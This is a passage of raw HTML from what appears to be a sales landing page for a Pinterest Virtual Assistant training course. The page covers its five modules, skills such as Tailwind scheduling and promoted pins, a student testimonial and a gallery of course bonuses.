allowfullscreen src="https://player.vimeo.com/video/328752337?color&amp;autopause=0&amp;loop=0&amp;muted=0&amp;title=1&amp;portrait=1&amp;byline=1#t="></iframe> <div class="elementor-custom-embed-image-overlay" style="background-image: url(https://pinterestva.com/wp-content/uploads/2019/04/3-1.png);"> </div> </div> </div> </div> </div> </div> </div> </div> </div> </section> <section class="elementor-element elementor-element-3ff0f61 elementor-section-stretched elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-id="3ff0f61" data-element_type="section" data-settings="{&quot;stretch_section&quot;:&quot;section-stretched&quot;,&quot;background_background&quot;:&quot;classic&quot;}"> <div class="elementor-background-overlay"></div> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div class="elementor-element elementor-element-b4c63f5 elementor-column elementor-col-100 elementor-top-column" data-id="b4c63f5" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-6dc6ac8 elementor-align-center elementor-widget elementor-widget-button" data-id="6dc6ac8" data-element_type="widget" data-widget_type="button.default"> <div class="elementor-widget-container"> <div class="elementor-button-wrapper"> <a href="https://pinterestva.lpages.co/leadbox/140d85c73f72a2%3A1521bf1e0946dc/5668600916475904" class="elementor-button-link elementor-button elementor-size-md" role="button"> <span class="elementor-button-content-wrapper"> <span class="elementor-button-text">ADD ME TO THE WAITLIST!</span> </span> </a> </div> </div> </div> <div class="elementor-element elementor-element-95938e8 elementor-widget elementor-widget-divider" data-id="95938e8" data-element_type="widget" data-widget_type="divider.default"> <div class="elementor-widget-container"> <div class="elementor-divider"> <span class="elementor-divider-separator"></span> </div> </div> </div> <div class="elementor-element elementor-element-8ac32f1 elementor-widget elementor-widget-heading" data-id="8ac32f1" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h1 class="elementor-heading-title elementor-size-default">Here’s a sample of what you’ll learn in each of the 5 modules: <br></h1> </div> </div> <div class="elementor-element elementor-element-aaf6bc8 elementor-widget elementor-widget-image" data-id="aaf6bc8" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <div class="elementor-image"> <img width="156" height="156" src="https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/uploads/2019/04/PVABullseye-e1554401771612.png" class="attachment-medium size-medium" alt="" srcset="https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/uploads/2019/04/PVABullseye-e1554401771612.png 156w, https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/uploads/2019/04/PVABullseye-e1554401771612-150x150.png 150w" sizes="(max-width: 156px) 100vw, 156px" /> </div> </div> </div> <div class="elementor-element elementor-element-0697e31 elementor-widget elementor-widget-heading" data-id="0697e31" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h1 class="elementor-heading-title elementor-size-default">Understanding the PVA Role</h1> </div> </div> <div class="elementor-element elementor-element-0158715 elementor-widget elementor-widget-text-editor" data-id="0158715" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <div class="elementor-text-editor elementor-clearfix"><h3>Learn what a Pinterest Virtual Assistant and Pinterest Manager is and how to work with a client in an online environment.</h3> <div>&nbsp;</div> <h3>We’ll also review key terms and phrases that you’ll see and hear throughout your training.&nbsp;</h3><div><br></div></div> </div> </div> <div class="elementor-element elementor-element-7162185 elementor-widget elementor-widget-image" data-id="7162185" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <div class="elementor-image"> <img width="208" height="126" src="https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/uploads/2019/04/PVA-e1554401949616.png" class="attachment-medium size-medium" alt="" /> </div> </div> </div> <div class="elementor-element elementor-element-10d3573 elementor-widget elementor-widget-heading" data-id="10d3573" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h1 class="elementor-heading-title elementor-size-default">Services You Can Offer, How Much to Charge and Goal Setting for Your New Biz</h1> </div> </div> <div class="elementor-element elementor-element-070a509 elementor-widget elementor-widget-text-editor" data-id="070a509" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <div class="elementor-text-editor elementor-clearfix"><h3>Explore 10+ specific services you can offer inside of the Pinterest niche. <em>Yes, there are that many!</em></h3><div><em> </em></div><h3>While you can pick and choose what services to offer, you will most likely gravitate towards different services based on your interests and growing experience – ALL pay well.</h3><div> </div><h3>Learn how to set your rates and how much to charge, including a sliding pay scale from beginner to advanced level Pinterest VA/manager.</h3><div> </div><h3>Our students earn recurring monthly (aka month-after-month!) income, ranging from side hustle level to quitting their day jobs and bringing home a full-time salary!</h3><div> </div></div> </div> </div> <div class="elementor-element elementor-element-49ae1d7 elementor-widget elementor-widget-image" data-id="49ae1d7" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <div class="elementor-image"> <img width="209" height="143" src="https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/uploads/2019/04/PVAChat-e1554401920220.png" class="attachment-medium size-medium" alt="" /> </div> </div> </div> <div class="elementor-element elementor-element-9a66fa4 elementor-widget elementor-widget-heading" data-id="9a66fa4" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h1 class="elementor-heading-title elementor-size-default">How to Find and Land Pinterest Clients</h1> </div> </div> <div class="elementor-element elementor-element-4a6429a elementor-widget elementor-widget-text-editor" data-id="4a6429a" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <div class="elementor-text-editor elementor-clearfix"><h3>Understand what makes for a great client (and who doesn’t!).</h3><div> </div><h3>Using a variety of methods (both online and off!), we’ll show you how to find and land clients in specific markets, using our <em>exact</em> pitching templates. BOOM! <img class="emoji" draggable="false" src="https://s.w.org/images/core/emoji/11.2.0/svg/1f44a.svg" alt="👊" /></h3><div> </div><h3>Learn how to publicly display your Pinterest services through a variety of online platforms – aka you don’t have to have a blog/website if you don’t want to!</h3><div> </div></div> </div> </div> <div class="elementor-element elementor-element-84b628c elementor-widget elementor-widget-image" data-id="84b628c" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <div class="elementor-image"> <img width="206" height="110" src="https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/uploads/2019/04/PVAEmail-e1554401899517.png" class="attachment-medium size-medium" alt="" /> </div> </div> </div> <div class="elementor-element elementor-element-44ef712 elementor-widget elementor-widget-heading" data-id="44ef712" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h1 class="elementor-heading-title elementor-size-default">Client Onboarding/Growing the Client Relationship</h1> </div> </div> <div class="elementor-element elementor-element-03df821 elementor-widget elementor-widget-text-editor" data-id="03df821" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <div class="elementor-text-editor elementor-clearfix"><h3>Our bonus client onboarding workbook will walk you through the entire onboarding process – use it every time you land a client!</h3><div> </div><h3>Confidently measure and deliver monthly client reporting using our bonus analytics workbook and customizable reporting template.</h3><div> </div><h3>We’ll even review how to invoice clients (with examples!) and best business practices, <strong>so you know how to get paid yo!</strong><strong> </strong></h3><div><strong> </strong></div></div> </div> </div> <div class="elementor-element elementor-element-c73f261 elementor-widget elementor-widget-image" data-id="c73f261" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <div class="elementor-image"> <img width="218" height="95" src="https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/uploads/2019/04/PVAUp-e1554401869762.png" class="attachment-medium size-medium" alt="" /> </div> </div> </div> <div class="elementor-element elementor-element-c3b29d0 elementor-widget elementor-widget-heading" data-id="c3b29d0" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h1 class="elementor-heading-title elementor-size-default">Expanding Your Pinterest VA Business</h1> </div> </div> <div class="elementor-element elementor-element-104cf9a elementor-widget elementor-widget-text-editor" data-id="104cf9a" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <div class="elementor-text-editor elementor-clearfix"><h3>We’ll walk you through what it looks like to go from a newbie PVA to an advanced Pinterest Manager, including how to grow and scale your service-based business.</h3><div> </div><h3>Confidently write case studies, solicit client testimonials, grow your team – heck, maybe a Pinterest Management agency is even in your future?</h3></div> </div> </div> </div> </div> </div> </div> </div> </section> <section class="elementor-element elementor-element-986a6f4 elementor-section-full_width elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-id="986a6f4" data-element_type="section" data-settings="{&quot;background_background&quot;:&quot;classic&quot;}"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div class="elementor-element elementor-element-d24f841 elementor-column elementor-col-100 elementor-top-column" data-id="d24f841" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-44b7bbd elementor-widget elementor-widget-heading" data-id="44b7bbd" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">Additionally, we’ll arm you with some mad tech skills<br>(the program includes more than what’s listed)! <img draggable="false" class="emoji" alt="👇" src="https://s.w.org/images/core/emoji/11.2.0/svg/1f447.svg"></h2> </div> </div> </div> </div> </div> </div> </div> </section> <section class="elementor-element elementor-element-519b32c elementor-section-stretched elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-id="519b32c" data-element_type="section" data-settings="{&quot;stretch_section&quot;:&quot;section-stretched&quot;,&quot;background_background&quot;:&quot;classic&quot;}"> <div class="elementor-background-overlay"></div> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div class="elementor-element elementor-element-14bfc50 elementor-column elementor-col-100 elementor-top-column" data-id="14bfc50" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-cc10014 elementor-widget elementor-widget-heading" data-id="cc10014" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h1 class="elementor-heading-title elementor-size-default">✅ Learn the Basics (or Get a Refresher!)</h1> </div> </div> <div class="elementor-element elementor-element-83d5c75 elementor-widget elementor-widget-text-editor" data-id="83d5c75" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <div class="elementor-text-editor elementor-clearfix"><h3>Whether you are brand new to Pinterest or have a couple of Pinterest VA clients under your belt, we regularly update our tech training videos to include basic how-to’s, highlight new features and more.</h3><div> </div><h3>These videos make for great building blocks – watch them over-and-over if needed and use them to implement the basics for every client.</h3><div> </div></div> </div> </div> <div class="elementor-element elementor-element-0f40d68 elementor-widget elementor-widget-heading" data-id="0f40d68" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h1 class="elementor-heading-title elementor-size-default">✅ Prep Your Client’s Account </h1> </div> </div> <div class="elementor-element elementor-element-e8c13cc elementor-widget elementor-widget-text-editor" data-id="e8c13cc" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <div class="elementor-text-editor elementor-clearfix"><h3>Before you can fully maximize your client’s Pinterest potential, it’s important to make sure your client’s account is prepped and ready.</h3><h3> </h3><h3>Heck, most existing clients need a quick tidy up!</h3><h3> </h3><h3>Master the steps you need to take when you land your first</h3><h3> client and exactly how to set up their Pinterest and Tailwind accounts.</h3><div> </div></div> </div> </div> <div class="elementor-element elementor-element-9aad4ef elementor-widget elementor-widget-heading" data-id="9aad4ef" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h1 class="elementor-heading-title elementor-size-default">✅ How to Maximize Pinterest's Smart Feed</h1> </div> </div> <div class="elementor-element elementor-element-490d567 elementor-widget elementor-widget-text-editor" data-id="490d567" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <div class="elementor-text-editor elementor-clearfix"><h3>Organically grow your client&#8217;s account by increasing Pinterest traffic, click thru rates and obtaining higher search result rankings (what others refer to as “SEO”).</h3><div><br></div> <h3>We’ll cover the strategies we’ve used and recommend for optimal results. Bonus, we&#8217;ll cover the impact of Tailwind Tribes and group boards too!</h3><div><br></div></div> </div> </div> <div class="elementor-element elementor-element-c16d822 elementor-widget elementor-widget-heading" data-id="c16d822" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h1 class="elementor-heading-title elementor-size-default">✅ How to Automate Pinning with Scheduling and SmartLoop</h1> </div> </div> <div class="elementor-element elementor-element-f52ddaf elementor-widget elementor-widget-text-editor" data-id="f52ddaf" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <div class="elementor-text-editor elementor-clearfix"><h3>Using our favorite scheduling tool, we&#8217;ll share our top-performing repeatable strategies that you can implement with your own clients.</h3><div><br></div> <h3>Schedule smarter with time blocking and work smarter (not harder!) each week.</h3><div><br></div> <h3>There’s no “set it and forget it attitude” though – you’ll learn how to monitor scheduling, discover what’s working, what’s not and how to fix it.</h3><div><br></div></div> </div> </div> <div class="elementor-element elementor-element-56e530c elementor-widget elementor-widget-heading" data-id="56e530c" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h1 class="elementor-heading-title elementor-size-default">✅ Promoted Pins</h1> </div> </div> <div class="elementor-element elementor-element-d965d6f elementor-widget elementor-widget-text-editor" data-id="d965d6f" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <div class="elementor-text-editor elementor-clearfix"><h3>Promoted pins are quickly becoming a more affordable option for clients with various size budgets.</h3><div><br></div> <h3>We’ve worked 1:1 with two Pinterest Ads Managers (on multiple profitable campaigns!).&nbsp;</h3><h3><br></h3><h3>As a direct result, we’re qualified to teach you how to set up and manage ads for your own clients.</h3><div><br></div> <h3>This includes how to install the Pinterest tag, the different types of campaigns you can choose from, how to set up conversions, how to track (and gauge!) results and more.</h3><div><br></div></div> </div> </div> <div class="elementor-element elementor-element-51e7271 elementor-widget elementor-widget-heading" data-id="51e7271" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h1 class="elementor-heading-title elementor-size-default">✅ Pin Design and Pinterest SEO</h1> </div> </div> <div class="elementor-element elementor-element-b79d03f elementor-widget elementor-widget-text-editor" data-id="b79d03f" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <div class="elementor-text-editor elementor-clearfix"><h3>All pins are <strong>not</strong> created equal and <strong>not</strong> all pins will go viral.</h3><div><br></div> <h3>No worries – we understand the difference and can teach you too!</h3><div><br></div> <h3>Learn what to look for when reviewing a client’s pin, how to make improvements and/or how to make a new pin from scratch.</h3><div><br></div> <h3>We’ll share our favorite (FREE!) tool we use for creating pins and how to design pins in batches to save time.&nbsp;</h3><h3><br></h3><h3>Learn how to add pins to Pinterest and your client’s account, as well as <strong>how to make and implement invisible pins</strong>.</h3><div><br></div> <h3>It’s not all about designing a pretty pin though!</h3><div><br></div> <h3>You’ll learn all about Pinterest SEO (it’s similar to Google SEO), and how to organically get your client’s pins to rank higher in the search bar – this leads to more traffic and click thru&#8217;s.</h3><div><br></div></div> </div> </div> <div class="elementor-element elementor-element-2bdb885 elementor-widget elementor-widget-heading" data-id="2bdb885" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h1 class="elementor-heading-title elementor-size-default">✅ Confirm Your Client Is Capitalizing on Their Pinterest Traffic </h1> </div> </div> <div class="elementor-element elementor-element-968257c elementor-widget elementor-widget-text-editor" data-id="968257c" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <div class="elementor-text-editor elementor-clearfix"><h3>As a Pinterest VA and Pinterest Manager, your job is to grow your client’s Pinterest account and send traffic back to their website.</h3><div> </div><h3>Your role is an important piece of a client’s marketing plan – but is your client effectively using Pinterest for maximum gains?</h3><div> </div><h3>If your client doesn’t have a strong strategy in place on their end (and isn’t producing revenue properly), the traffic you drive to your client’s account will be moot.</h3><div> </div><h3>As in no good. <img class="emoji" draggable="false" src="https://s.w.org/images/core/emoji/11.2.0/svg/1f613.svg" alt="😓" /></h3><div> </div><h3>It’s important to learn how a client uses various strategies to capitalize on Pinterest traffic – while most clients already have a system in place, not all will!</h3><div> </div><h3>Our program covers sales funnels, email marketing and opt-ins, direct sales and more.</h3><div> </div><h3>Many Pinterest VAs and Pinterest Managers often provide additional marketing help (at an additional cost!) to help a client capitalize on Pinterest traffic – we love ways to scale!</h3></div> </div> </div> <div class="elementor-element elementor-element-da0cddc elementor-widget elementor-widget-divider" data-id="da0cddc" data-element_type="widget" data-widget_type="divider.default"> <div class="elementor-widget-container"> <div class="elementor-divider"> <span class="elementor-divider-separator"></span> </div> </div> </div> </div> </div> </div> </div> </div> </section> <section class="elementor-element elementor-element-4c33412 elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-id="4c33412" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div class="elementor-element elementor-element-efb0336 elementor-column elementor-col-100 elementor-top-column" data-id="efb0336" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-f91cfab elementor-widget elementor-widget-heading" data-id="f91cfab" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">Meet Suzie!</h2> </div> </div> <div class="elementor-element elementor-element-d9345b9 elementor-widget elementor-widget-text-editor" data-id="d9345b9" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <div class="elementor-text-editor elementor-clearfix"><h3>Suzie became a Pinterest virtual assistant because she wanted to boost her family&#8217;s income.</h3><h3> </h3><h3>She made her investment back with her very first client and&#8230;</h3><p> </p><h3>Became fully booked within SIX MONTHS!</h3></div> </div> </div> <div class="elementor-element elementor-element-0d1db85 elementor-aspect-ratio-169 elementor-widget elementor-widget-video" data-id="0d1db85" data-element_type="widget" data-settings="{&quot;aspect_ratio&quot;:&quot;169&quot;}" data-widget_type="video.default"> <div class="elementor-widget-container"> <div class="elementor-wrapper elementor-fit-aspect-ratio elementor-open-inline"> <iframe class="elementor-video-iframe" allowfullscreen src="https://player.vimeo.com/video/328752595?color&amp;autopause=0&amp;loop=0&amp;muted=0&amp;title=1&amp;portrait=1&amp;byline=1#t="></iframe> <div class="elementor-custom-embed-image-overlay" style="background-image: url(https://pinterestva.com/wp-content/uploads/2019/04/1-1.png);"> </div> </div> </div> </div> </div> </div> </div> </div> </div> </section> <section class="elementor-element elementor-element-98d81d0 elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-id="98d81d0" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div class="elementor-element elementor-element-9b3863d elementor-column elementor-col-100 elementor-top-column" data-id="9b3863d" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-bbe03f7 elementor-widget elementor-widget-divider" data-id="bbe03f7" data-element_type="widget" data-widget_type="divider.default"> <div class="elementor-widget-container"> <div class="elementor-divider"> <span class="elementor-divider-separator"></span> </div> </div> </div> </div> </div> </div> </div> </div> </section> <section class="elementor-element elementor-element-4236c5f elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-id="4236c5f" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div class="elementor-element elementor-element-995eb19 elementor-column elementor-col-100 elementor-top-column" data-id="995eb19" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-9711289 elementor-widget elementor-widget-heading" data-id="9711289" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h1 class="elementor-heading-title elementor-size-default">WANT BONUSES? <br><br>GREAT! WE HAVE 9 WORTH THOUSANDS OF DOLLARS!</h1> </div> </div> </div> </div> </div> </div> </div> </section> <section class="elementor-element elementor-element-58a672f elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-id="58a672f" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div class="elementor-element elementor-element-9b7ee2c elementor-column elementor-col-100 elementor-top-column" data-id="9b7ee2c" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-2dfa43d elementor-widget elementor-widget-image-gallery" data-id="2dfa43d" data-element_type="widget" data-widget_type="image-gallery.default"> <div class="elementor-widget-container"> <div class="elementor-image-gallery"> <style type='text/css'> #gallery-1 { margin: auto; } #gallery-1 .gallery-item { float: left; margin-top: 10px; text-align: center; width: 33%; } #gallery-1 img { border: 2px solid #cfcfcf; } #gallery-1 .gallery-caption { margin-left: 0; } /* see gallery_shortcode() in wp-includes/media.php */ </style> <div id='gallery-1' class='gallery galleryid-1949 gallery-columns-3 gallery-size-medium'><dl class='gallery-item'> <dt class='gallery-icon landscape'> <a data-elementor-open-lightbox="default" data-elementor-lightbox-slideshow="2dfa43d" href='https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/uploads/2019/04/Exclusive-Client-Leads.png'><img width="300" height="200" src="https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/uploads/2019/04/Exclusive-Client-Leads-300x200.png" class="attachment-medium size-medium" alt="" srcset="https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/uploads/2019/04/Exclusive-Client-Leads-300x200.png 300w, https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/uploads/2019/04/Exclusive-Client-Leads.png 576w" sizes="(max-width: 300px) 100vw, 300px" /></a> </dt></dl><dl class='gallery-item'> <dt class='gallery-icon landscape'> <a data-elementor-open-lightbox="default" data-elementor-lightbox-slideshow="2dfa43d" href='https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/uploads/2019/04/60-DAYS-OF-TAILWIND-FOR-FREE-FOR-NEW-STUDENTS-1.png'><img width="300" height="200" src="https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/uploads/2019/04/60-DAYS-OF-TAILWIND-FOR-FREE-FOR-NEW-STUDENTS-1-300x200.png" class="attachment-medium size-medium" alt="" srcset="https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/uploads/2019/04/60-DAYS-OF-TAILWIND-FOR-FREE-FOR-NEW-STUDENTS-1-300x200.png 300w, https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/uploads/2019/04/60-DAYS-OF-TAILWIND-FOR-FREE-FOR-NEW-STUDENTS-1.png 576w" sizes="(max-width: 300px) 100vw, 300px" /></a> </dt></dl><dl class='gallery-item'> <dt class='gallery-icon landscape'> <a data-elementor-open-lightbox="default" data-elementor-lightbox-slideshow="2dfa43d" href='https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/uploads/2019/04/Weekly-Office-Hours-with-Kristin-and-Gina.png'><img width="300" height="200" src="https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/uploads/2019/04/Weekly-Office-Hours-with-Kristin-and-Gina-300x200.png" class="attachment-medium size-medium" alt="" srcset="https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/uploads/2019/04/Weekly-Office-Hours-with-Kristin-and-Gina-300x200.png 300w, https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/uploads/2019/04/Weekly-Office-Hours-with-Kristin-and-Gina.png 576w" sizes="(max-width: 300px) 100vw, 300px" /></a> </dt></dl><br style="clear: both" /><dl class='gallery-item'> <dt class='gallery-icon landscape'> <a data-elementor-open-lightbox="default" data-elementor-lightbox-slideshow="2dfa43d" href='https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/uploads/2019/04/Promoted-Pins-Training.png'><img width="300" height="200" src="https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/uploads/2019/04/Promoted-Pins-Training-300x200.png" class="attachment-medium size-medium" alt="" srcset="https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/uploads/2019/04/Promoted-Pins-Training-300x200.png 300w, https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/uploads/2019/04/Promoted-Pins-Training.png 576w" sizes="(max-width: 300px) 100vw, 300px" /></a> </dt></dl><dl class='gallery-item'> <dt class='gallery-icon landscape'> <a data-elementor-open-lightbox="default" data-elementor-lightbox-slideshow="2dfa43d" href='https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/uploads/2019/04/60-Days-TPP.png'><img width="300" height="200" src="https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/uploads/2019/04/60-Days-TPP-300x200.png" class="attachment-medium size-medium" alt="" srcset="https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/uploads/2019/04/60-Days-TPP-300x200.png 300w, https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/uploads/2019/04/60-Days-TPP.png 576w" sizes="(max-width: 300px) 100vw, 300px" /></a> </dt></dl><dl class='gallery-item'> <dt class='gallery-icon landscape'> <a data-elementor-open-lightbox="default" data-elementor-lightbox-slideshow="2dfa43d" href='https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/uploads/2019/04/CLIENT-MONTHLY-ANALYTICS-TEMPLATE-AND-REPORT.png'><img width="300" height="200" src="https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/uploads/2019/04/CLIENT-MONTHLY-ANALYTICS-TEMPLATE-AND-REPORT-300x200.png" class="attachment-medium size-medium" alt="" srcset="https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/uploads/2019/04/CLIENT-MONTHLY-ANALYTICS-TEMPLATE-AND-REPORT-300x200.png 300w, https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/uploads/2019/04/CLIENT-MONTHLY-ANALYTICS-TEMPLATE-AND-REPORT.png 576w" sizes="(max-width: 300px) 100vw, 300px" /></a> </dt></dl><br style="clear: both" /><dl class='gallery-item'> <dt class='gallery-icon landscape'> <a data-elementor-open-lightbox="default" data-elementor-lightbox-slideshow="2dfa43d" href='https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/uploads/2019/04/60-DAYS-OF-TAILWIND-FOR-FREE-FOR-NEW-STUDENTS-2.png'><img width="300" height="200" src="https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/uploads/2019/04/60-DAYS-OF-TAILWIND-FOR-FREE-FOR-NEW-STUDENTS-2-300x200.png" class="attachment-medium size-medium" alt="" srcset="https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/uploads/2019/04/60-DAYS-OF-TAILWIND-FOR-FREE-FOR-NEW-STUDENTS-2-300x200.png 300w, https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/uploads/2019/04/60-DAYS-OF-TAILWIND-FOR-FREE-FOR-NEW-STUDENTS-2.png 576w" sizes="(max-width: 300px) 100vw, 300px" /></a> </dt></dl><dl class='gallery-item'> <dt class='gallery-icon landscape'> <a data-elementor-open-lightbox="default" data-elementor-lightbox-slideshow="2dfa43d" href='https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/uploads/2019/04/Lifetime-Access-to-the-Program-FREE-Updates-to-the-Material.png'><img width="300" height="200" src="https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/uploads/2019/04/Lifetime-Access-to-the-Program-FREE-Updates-to-the-Material-300x200.png" class="attachment-medium size-medium" alt="" srcset="https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/uploads/2019/04/Lifetime-Access-to-the-Program-FREE-Updates-to-the-Material-300x200.png 300w, https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/uploads/2019/04/Lifetime-Access-to-the-Program-FREE-Updates-to-the-Material.png 576w" sizes="(max-width: 300px) 100vw, 300px" /></a> </dt></dl><dl class='gallery-item'> <dt class='gallery-icon landscape'> <a data-elementor-open-lightbox="default" data-elementor-lightbox-slideshow="2dfa43d" href='https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/uploads/2019/04/PROMOTED-PINS-TRAINING-CLIENT-ONBOARDING-WORKBOOK.png'><img width="300" height="200" src="https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/uploads/2019/04/PROMOTED-PINS-TRAINING-CLIENT-ONBOARDING-WORKBOOK-300x200.png" class="attachment-medium size-medium" alt="" srcset="https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/uploads/2019/04/PROMOTED-PINS-TRAINING-CLIENT-ONBOARDING-WORKBOOK-300x200.png 300w, https://sxqykv430h-flywheel.netdna-ssl.com/wp-content/uploads/2019/04/PROMOTED-PINS-TRAINING-CLIENT-ONBOARDING-WORKBOOK.png 576w" sizes="(max-width: 300px) 100vw, 300px" /></a> </dt></dl><br style="clear: both" /> </div> </div> </div> </div> </div> </div> </div> </div> </div> </section> <section class="elementor-element elementor-element-3e52dc2 elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-id="3e52dc2" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div class="elementor-element elementor-element-08ef582 elementor-column elementor-col-100 elementor-top-column" data-id="08ef582" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-f0579b8 elementor-widget elementor-widget-divider" data-id="f0579b8" data-element_type="widget" data-widget_type="divider.default"> <div class="elementor-widget-container"> <div class="elementor-divider"> <span class="elementor-divider-separator"></span> </div> </div> </div> </div> </div> </div> </div> </div> </section> <section class="elementor-element elementor-element-4a50745 elementor-section-stretched elementor-section-full_width elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-id="4a50745" data-element_type="section" data-settings="{&quot;background_background&quot;:&quot;classic&quot;,&quot;stretch_section&quot;:&quot;section-stretched&quot;}"> <div class="elementor-background-overlay"></div> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div class="elementor-element elementor-element-038c80c elementor-column elementor-col-100 elementor-top-column" data-id="038c80c" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div 